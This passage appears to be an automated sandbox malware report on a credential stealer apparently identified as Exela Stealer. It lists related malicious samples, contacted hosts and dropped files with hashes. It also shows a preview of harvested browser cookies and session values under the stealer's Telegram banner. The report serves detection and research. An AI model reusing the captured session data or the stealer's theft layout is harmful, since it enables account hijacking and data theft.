                                                                                                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                  20:53:00API Interceptor5x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                  20:53:06API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                  20:53:06API Interceptor19x Sleep call for process: powershell.exe modified

                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  208.95.112.1vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                  • ip-api.com/xml
                                                                                                                                                                                                                  Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                  • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                  Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                  VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                  • ip-api.com/json/?fields=61439
                                                                                                                                                                                                                  SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                                                                                                                                                  • ip-api.com/json/
                                                                                                                                                                                                                  SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                  • ip-api.com/json/?fields=61439
                                                                                                                                                                                                                  987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                  good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                  • ip-api.com/json/
                                                                                                                                                                                                                  Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                  • ip-api.com/json/
                                                                                                                                                                                                                  DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                  • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                  162.159.137.232arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                      phost.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                        WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            program.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                              NEVER OPEN!.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                                                                                                                                                                YDW0S5K7hi.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                                  Xyq6rvzLJs.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                                    CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse

                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      ip-api.comvEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      canary.discord.comcPl7CoJTBx.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                                                                                                                                                                                                      • 162.159.128.233
                                                                                                                                                                                                                                      e45AiBoV6X.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                      • 162.159.137.232
                                                                                                                                                                                                                                      Built (1).exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                      • 162.159.128.233
                                                                                                                                                                                                                                      GalacticShooter (3).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 162.159.136.232
                                                                                                                                                                                                                                      GalacticShooter (3).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 162.159.128.233
                                                                                                                                                                                                                                      322pVOVprx.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                                                                      • 162.159.128.233
                                                                                                                                                                                                                                      S3zoj9Uts0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 162.159.138.232
                                                                                                                                                                                                                                      uBZeAVcb6r.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 162.159.137.232
                                                                                                                                                                                                                                      12057ad2.exeGet hashmaliciousNitroRansomwareBrowse
                                                                                                                                                                                                                                      • 162.159.138.232
                                                                                                                                                                                                                                      build (2).exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                      • 162.159.136.232
                                                                                                                                                                                                                                      bg.microsoft.map.fastly.net2VsJzzWTpA.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                                                                      2VsJzzWTpA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                      YJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                      O782uurN5d.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                      bKxtUOPLtR.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                      46VHQmFDxC.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                      vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                                                                      GYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                      Qu3ped8inH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                      DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                                                                                                                                      • 199.232.214.172

                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      CLOUDFLARENETUShttps://thetollroads.com-wfmo.xyz/usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.17.25.14
                                                                                                                                                                                                                                      http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.16.123.96
                                                                                                                                                                                                                                      decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.16.1
                                                                                                                                                                                                                                      decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.16.1
                                                                                                                                                                                                                                      FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.16.123.96
                                                                                                                                                                                                                                      OPRfEWLTto.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.75.126
                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 172.67.157.249
                                                                                                                                                                                                                                      ILxa85qCjP.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 172.67.175.217
                                                                                                                                                                                                                                      PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      TUT-ASUSvEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 162.252.214.4
                                                                                                                                                                                                                                      Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      CLOUDFLARENETUShttps://thetollroads.com-wfmo.xyz/usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.17.25.14
                                                                                                                                                                                                                                      http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.16.123.96
                                                                                                                                                                                                                                      decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.16.1
                                                                                                                                                                                                                                      decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.16.1
                                                                                                                                                                                                                                      FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.16.123.96
                                                                                                                                                                                                                                      OPRfEWLTto.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.75.126
                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 172.67.157.249
                                                                                                                                                                                                                                      ILxa85qCjP.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 172.67.175.217
                                                                                                                                                                                                                                      PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      AMAZON-02US.i.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 54.171.230.55
                                                                                                                                                                                                                                      http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 52.217.136.154
                                                                                                                                                                                                                                      i.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 54.171.230.55
                                                                                                                                                                                                                                      allpdfpro.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 143.204.98.59
                                                                                                                                                                                                                                      FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 52.59.81.109
                                                                                                                                                                                                                                      boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 54.171.230.55
                                                                                                                                                                                                                                      boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 34.243.160.129
                                                                                                                                                                                                                                      over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      • 18.238.49.52
                                                                                                                                                                                                                                      http://knoxoms.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 34.210.182.11
                                                                                                                                                                                                                                      boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 54.171.230.55

                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI13962\VCRUNTIME140.dllPDF_Resave.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        phost.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          shost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                                                                                                                                                                                                                                            sppawx.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              qhos.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                                                                                                                                                                                                                                                wsapx.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                  lz4wnSavmK.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                                                    WVuXCNNYG0.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                                                      dipwo1iToJ.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                                                        Counseling_Services_Overview.docmGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                                                                                          Entropy (8bit):1.307320057862836
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrR:KooCEYhgYEL0In
                                                                                                                                                                                                                                                          MD5:C7CEBD9F9C39C2D63926BF6F7843C489
                                                                                                                                                                                                                                                          SHA1:ECFCE213C1B264B1BC585DFD69B976C7A1583CC2
                                                                                                                                                                                                                                                          SHA-256:29B221D62F788128CF2ACEEDBD1A42480622324B599669A61A04BF54212F0552
                                                                                                                                                                                                                                                          SHA-512:702BA4EAB1962B8A0338EE6F133551A671428BEABF82EE65BB8EB47B74231CC4224E7B877CC3F64BE92CF2E1E15A2C365120111AF403E76E5AE72378167DE09B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0957a363, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                                                                                          Entropy (8bit):0.4220577820941714
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
                                                                                                                                                                                                                                                          MD5:E8AE16DD0BF5EF7A966EA84CA35C00E9
                                                                                                                                                                                                                                                          SHA1:7494B9278619852773265C881BDD71086B418311
                                                                                                                                                                                                                                                          SHA-256:C427FB24477A1AD702B67D779CBCE78E2C560A591EF8071BE881FFF2A922A1B3
                                                                                                                                                                                                                                                          SHA-512:D9D0B8C6E4671C7936AE4790C00AE4F86310FB2AEA579E13A62A501E05B288B2B00ABBBE54FE8F6FF2B1BEDB43AD23F016248C26B3918724476AD61010AD6E91
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.W.c... .......A.......X\...;...{......................0.!..........{A..5...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.......................................5...}...................Y~..5...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                                                                          Entropy (8bit):0.07492417746599407
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:HvmXlKYeVHYaZajn13a/5eqa1lallcVO/lnlZMxZNQl:e1KzVHpa53q5ejAOewk
                                                                                                                                                                                                                                                          MD5:7044A1DC53E9067555D3DBB9A7C0CD1B
                                                                                                                                                                                                                                                          SHA1:D6D2DB0A7C2671BA2C824F9EC3F2CD9066F7E5B9
                                                                                                                                                                                                                                                          SHA-256:2E9EE533CE9F4715AE3B585A9FEA7C80B5394DBE73C7218869C1EC1B191007FD
                                                                                                                                                                                                                                                          SHA-512:4A3C6C165776A1764B9CE3AF3B53BCA88AC6C9E9DA06A80EEDD705E4CE2BE0C8013F22F6E766B8227F03BB5716CD3F24E315D7EDB8459F6F92B06F1ECF4892A7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.........................................;...{...5...}.......{A..............{A......{A..........{A].................Y~..5...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11803970
                                                                                                                                                                                                                                                          Entropy (8bit):7.996640205330543
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:196608:AUC1IYDEmmtSBLjv+bhqNVobZ1Uh8mAIv9P5jQ1KJEaKOlx:TC+OEZtSZL+9qzGZeII3MCCOlx
                                                                                                                                                                                                                                                          MD5:8B8040D5875E4C41ED5091F92021A16B
                                                                                                                                                                                                                                                          SHA1:4EBB7B91E64A7193B61A0E1405847ED13563F7D5
                                                                                                                                                                                                                                                          SHA-256:7E7597691235F0FF8A8DF29EE3E54EA7A69B43B4EF727ADF511E7AEC749DC68A
                                                                                                                                                                                                                                                          SHA-512:4703F8AD9543F2AA47A1C964E13C7BAD48A593284D53BAAC3581D6B584E63CAD5C88AFE6ACA2C8F2C708369E757B2CD150B95247C01BFD8B58D6915FED524A7A
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d.....f.........."....(.....l.................@....................................G2....`.................................................l...x.......,....`..."..............h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...,...........................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:@...e...........................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):707602
                                                                                                                                                                                                                                                          Entropy (8bit):7.99764650582294
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:12288:gJWrGSn7dWcSbn2gknkvx7XStuv+BETpx76W0VRZPGrM+4J1shI1+4uzFNxdDoQV:dSSJnYn+kvxj6uLTpx76W06Mvh4HftoA
                                                                                                                                                                                                                                                          MD5:9BBFF0760B442F12594437173F36EE9F
                                                                                                                                                                                                                                                          SHA1:F45BD39C8DB3F3A4433A1620860781860A5E161A
                                                                                                                                                                                                                                                          SHA-256:855153C6E19409BECEF9A7CB2B80E60400D373AAE9ABA4A440A78020FE6A6B64
                                                                                                                                                                                                                                                          SHA-512:7C57D7BF5E1EE5052B8B120B46AD4FAF2F4FA468407AC749447C618E450A65209925D823170F9B44801E9534083AF3B04CE1D75EF5F16943B9825A125B2E26CD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:PK...........Y................Browsers/PK...........Y................Wallets/PK...........Y..(.5...x.......Display (1).pngT.y<T...}f.l.FEe7".M...!F.A..*K%d7.)d.{d..e.d.*..X..B.}..,...w.......9.1.u]...z.'..X....n.....:.......p.`...Tm...n........?u_.H...bx.w./.z..t..._..@-.y.......y......8.3.f....1..?5.i...K[.Y.....=....:|t..ci.N. H+A..+...U<KT....$.r}"....w!.#...{.......(...-..[F...o*....t...b.....W......dH........a...O... ...>3>B...=..?.I.|uE..2m6?O.;#...b..".$Z4......1p#5.K...U..DX.]..5G...M....^..|r...nuF..e.....l..3?..'W..9..O.9*nN..Ob.;~z...z.}..~........M..q%|..K...xg.#..........e.......+."......W....H.w._y..oD.@....,.$).........{ay......N....zoAj...V..}.._.V..~.p.Q......%e+.-..^.+YWO|.jp....b=...=o....[w.....v..I.l.%..I.|..O.._.W..J.K......cbU..#.2...].,.....U..l*..)....'...*.E.?}..b..f.w8%.~lPm.z..H...g.........O.L#...'..~.4uN.w'm....[^..T_d..."...\...].......Rm..........X.....Cw..E...x.;........6.Z......_...(..n.......J..SU...<..=.(4.(

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Cookies.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (522), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3488
                                                                                                                                                                                                                                                          Entropy (8bit):5.880132531509811
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:LMJMpoO2gFcRqFZL2L+yLstv3pPDYReynqsbCw4R2cksr:eFFRiNEUd7
                                                                                                                                                                                                                                                          MD5:A77A3F14636E05B646BDD2E385CFCDC3
                                                                                                                                                                                                                                                          SHA1:11C80A73FB067FFB85C9BD80E66EF1179D1EBFB8
                                                                                                                                                                                                                                                          SHA-256:E0BD0C615EFC6E89164589897A280C9CB72FEF9084466AB63E77B0BA9939D6C0
                                                                                                                                                                                                                                                          SHA-512:46E3C8284596248FA43F9C767CE36F876B4B63B64D6CD2A93904CB3866E856D2043CFCC03537E4C9169DB59FD2F868FAB0989706DE4AFD48EEEC15EB43346656
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================...google.com.TRUE./.FALSE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.TRUE.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.TRUE.133

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Firefox\History.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1737
                                                                                                                                                                                                                                                          Entropy (8bit):4.137394051573412
                                                                                                                                                                                                                                                          Encrypted:false
